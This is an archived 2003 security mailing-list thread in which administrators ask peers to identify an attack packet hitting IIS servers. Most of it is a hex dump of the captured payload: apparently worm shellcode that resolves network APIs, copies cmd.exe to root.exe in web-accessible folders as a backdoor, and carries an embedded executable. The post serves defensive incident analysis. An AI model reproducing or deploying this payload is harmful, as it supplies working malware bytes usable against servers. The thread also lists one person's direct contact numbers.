Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs
Incidents
RE: strange cmd.exe access Jun 05 2003 04:22AM
MacDougall, Shane (smacdougall idanalytics com)
We saw the exact same packets attack our network from 3 different hosts.
It appears that somehow this attack successfully breached a "hardened"
IIS box. URLScan reported several typical Code Red type traffic from the
attacking IPs, and although the IIS log was scrubbed of some suspicious
activity, our syslogs and IDS indicated that the attack was successful.

Any info on these attack packets would be greatly appreciated.

Regards.
Shane

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Shane MacDougall
Lead Security Officer
ID Analytics
San Diego, California USA
Direct: (858) 427-2860
Toll Free: 866-240-4484 x 2860
Fax: 858-427-2899

-----Original Message-----
From: Q [mailto:quentyn (at) the-q.co (dot) uk [email concealed]]
Sent: Thursday, May 29, 2003 12:10 PM
To: incidents (at) securityfocus (dot) com [email concealed]
Subject: strange cmd.exe access

Hi I saw this packet

#(3 - 261684) [2003-05-09 19:43:00] [snort/1002] WEB-IIS cmd.exe access
IPv4: 194.204.X.X -> X.X.X.X
hlen=5 TOS=0 dlen=1472 ID=57174 flags=0 offset=0 TTL=116
chksum=60435
TCP: port=27761 -> dport: 80 flags=***A**** seq=915915841
ack=1210973630 off=5 res=0 win=17184 urp=0 chksum=16151
Payload: length = 1432

000 : FF 75 FC FF 55 F8 89 45 D8 E8 0F 00 00 00 47 6C .u..U..E......Gl
010 : 6F 62 61 6C 41 64 64 41 74 6F 6D 41 00 FF 75 FC obalAddAtomA..u.
020 : FF 55 F8 89 45 D4 E8 0C 00 00 00 43 6C 6F 73 65 .U..E......Close
030 : 48 61 6E 64 6C 65 00 FF 75 FC FF 55 F8 89 45 D0 Handle..u..U..E.
040 : E8 08 00 00 00 5F 6C 63 72 65 61 74 00 FF 75 FC ....._lcreat..u.
050 : FF 55 F8 89 45 CC E8 08 00 00 00 5F 6C 77 72 69 .U..E......_lwri
060 : 74 65 00 FF 75 FC FF 55 F8 89 45 C8 E8 08 00 00 te..u..U..E.....
070 : 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC FF 55 F8 89 ._lclose..u..U..
080 : 45 C4 E8 0E 00 00 00 47 65 74 53 79 73 74 65 6D E......GetSystem
090 : 54 69 6D 65 00 FF 75 FC FF 55 F8 89 45 C0 E8 0B Time..u..U..E...
0a0 : 00 00 00 57 53 32 5F 33 32 2E 44 4C 4C 00 FF 55 ...WS2_32.DLL..U
0b0 : F4 89 45 BC E8 07 00 00 00 73 6F 63 6B 65 74 00 ..E......socket.
0c0 : FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 00 00 63 6C .u..U..E......cl
0d0 : 6F 73 65 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 osesocket..u..U.
0e0 : 89 45 B4 E8 0C 00 00 00 69 6F 63 74 6C 73 6F 63 .E......ioctlsoc
0f0 : 6B 65 74 00 FF 75 BC FF 55 F8 89 45 A4 E8 08 00 ket..u..U..E....
100 : 00 00 63 6F 6E 6E 65 63 74 00 FF 75 BC FF 55 F8 ..connect..u..U.
110 : 89 45 B0 E8 07 00 00 00 73 65 6C 65 63 74 00 FF .E......select..
120 : 75 BC FF 55 F8 89 45 A0 E8 05 00 00 00 73 65 6E u..U..E......sen
130 : 64 00 FF 75 BC FF 55 F8 89 45 AC E8 05 00 00 00 d..u..U..E......
140 : 72 65 63 76 00 FF 75 BC FF 55 F8 89 45 A8 E8 0C recv..u..U..E...
150 : 00 00 00 67 65 74 68 6F 73 74 6E 61 6D 65 00 FF ...gethostname..
160 : 75 BC FF 55 F8 89 45 9C E8 0E 00 00 00 67 65 74 u..U..E......get
170 : 68 6F 73 74 62 79 6E 61 6D 65 00 FF 75 BC FF 55 hostbyname..u..U
180 : F8 89 45 98 E8 10 00 00 00 57 53 41 47 65 74 4C ..E......WSAGetL
190 : 61 73 74 45 72 72 6F 72 00 FF 75 BC FF 55 F8 89 astError..u..U..
1a0 : 45 94 E8 0B 00 00 00 55 53 45 52 33 32 2E 44 4C E......USER32.DL
1b0 : 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 00 45 78 69 L..U..E......Exi
1c0 : 74 57 69 6E 64 6F 77 73 45 78 00 FF 75 90 FF 55 tWindowsEx..u..U
1d0 : F8 89 45 8C C3 8B 45 84 69 C0 05 84 08 08 40 89 ..E...E.i.....@.
1e0 : 45 84 8D 84 04 78 56 34 12 F7 D8 C1 C0 08 C3 E8 E....xV4........
1f0 : E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 C3 E8 ED FF ....<.t.<.t.....
200 : FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 E3 10 E8 DC ................
210 : FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 E8 B4 FF FF ................
220 : FF 83 E0 07 E8 20 00 00 00 FF FF FF FF 00 FF FF ..... ..........
230 : FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 00 FF ................
240 : FF 00 00 FF FF 00 00 FF FF 59 8B 04 81 23 D8 F7 .........Y...#..
250 : D0 23 85 58 FE FF FF 0B D8 80 FB 7F 74 9F 80 FB .#.X......t...
260 : E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 68 04 01 00 .t.;.X...t..h...
270 : 00 8D 85 5C FE FF FF 50 FF 55 E0 8D BC 05 5C FE ...\...P.U....\.
280 : FF FF E8 09 00 00 00 5C 43 4D 44 2E 45 58 45 00 .......\CMD.EXE.
290 : 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 00 00 64 3A ^.....cj......d:
2a0 : 5C 69 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73 \inetpub\scripts
2b0 : 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 8D \root.exe...$...
2c0 : 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 2B 00 00 00 .\...P.U.j..+...
2d0 : 64 3A 5C 70 72 6F 67 72 61 7E 31 5C 63 6F 6D 6D d:\progra~1\comm
2e0 : 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C 4D 53 41 44 on~1\system\MSAD
2f0 : 43 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 C\root.exe...$..
300 : 8D 85 5C FE FF FF 50 FF 55 DC E8 BA 05 00 00 FC ..\...P.U.......
310 : 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 MZP.............
320 : B8 00 00 00 00 00 00 00 40 00 1A FC 00 00 01 FC ........ (at) ..... (dot) . [email concealed]
330 : FC FC FC FC FC 00 00 50 45 00 00 4C 01 03 00 FD .......PE..L....
340 : 2A 25 29 00 00 00 00 00 00 00 00 E0 00 8F 81 0B *%).............
350 : 01 02 19 00 04 00 00 00 08 00 00 00 00 00 00 00 ................
360 : 10 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 ........ ....@..
370 : 10 00 00 00 04 00 00 01 00 00 00 00 00 00 00 03 ................
380 : 00 0A 00 00 00 00 00 00 40 00 00 00 04 00 00 00 ........ (at) ..... (dot) . [email concealed]
390 : 00 00 00 02 00 00 00 00 00 10 00 00 20 00 00 00 ............ ...
3a0 : 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 ................
3b0 : 00 00 00 00 00 00 00 00 30 00 00 0C 01 FC FC FC ........0.......
3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3d0 : 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 10 ................
3e0 : 00 00 00 04 00 00 00 08 00 00 00 00 00 00 00 00 ................
3f0 : 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 ...... ..`......
400 : 00 00 00 10 00 00 00 20 00 00 00 04 00 00 00 0C ....... ........
410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 ..............@.
420 : 00 C0 00 00 00 00 00 00 00 00 00 10 00 00 00 30 ...............0
430 : 00 00 00 04 00 00 00 10 00 00 00 00 00 00 00 00 ................
440 : 00 00 00 00 00 00 40 00 00 C0 FC FC FC FC FC FC ...... (at) ....... (dot) . [email concealed]
450 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
460 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
470 : FC FC FC FC FC FC 00 00 00 00 00 00 00 00 00 00 ................
480 : 00 00 00 00 00 00 68 04 01 00 00 68 D0 20 40 00 ......h....h. @.
490 : E8 61 01 00 00 8D B8 D0 20 40 00 BE 00 20 40 00 .a...... @... @.
4a0 : A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 4C 01 00 00 ....j.h. @..L...
4b0 : E8 0C 00 00 00 68 C0 27 09 00 E8 31 01 00 00 EB .....h.'...1....
4c0 : EF 68 D8 24 40 00 68 3F 00 0F 00 6A 00 68 10 20 .h.$@.h?...j.h.
4d0 : 40 00 68 02 00 00 80 E8 32 01 00 00 0B C0 75 26 @.h.....2.....u&
4e0 : 6A 04 68 54 20 40 00 6A 04 6A 00 68 48 20 40 00 j.hT @.j.j.hH @.
4f0 : FF 35 D8 24 40 00 E8 0D 01 00 00 FF 35 D8 24 40 .5.$@.......5.$@
500 : 00 E8 0E 01 00 00 68 D8 24 40 00 68 3F 00 0F 00 ......h.$@.h?...
510 : 6A 00 68 58 20 40 00 68 02 00 00 80 E8 ED 00 00 j.hX @.h........
520 : 00 0B C0 75 55 BD 9C 20 40 00 E8 4C 00 00 00 BD ...uU.. @..L....
530 : A8 20 40 00 E8 42 00 00 00 6A 09 68 B8 20 40 00 . @..B...j.h. @.
540 : 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 24 40 00 E8 j.j.h. @..5.$@..
550 : B4 00 00 00 6A 09 68 C4 20 40 00 6A 01 6A 00 68 ....j.h. @.j.j.h
560 : B4 20 40 00 FF 35 D8 24 40 00 E8 99 00 00 00 FF . @..5.$@.......
570 : 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 05 D0 24 40 5.$@..........$@
580 : 00 00 04 00 00 68 D0 24 40 00 68 D0 20 40 00 68 .....h.$@.h. @.h
590 : D4 24 40 00 6A 00 55 FF .$@.j.U.

what is strange is that the cmd.exe / root.exe stuff is half way through
with some other code before it

the ip it hit was not mapped to anything ( I believe it is unused) so
this
can not have been part of another tcp converstion

any ideas ?

--
The should be a sig here, but it got bored and wandered off

------------------------------------------------------------------------

----
------------------------------------------------------------------------

----

------------------------------------------------------------------------
----
------------------------------------------------------------------------
----

[ reply ]




 

Privacy Statement
Copyright 2009, SecurityFocus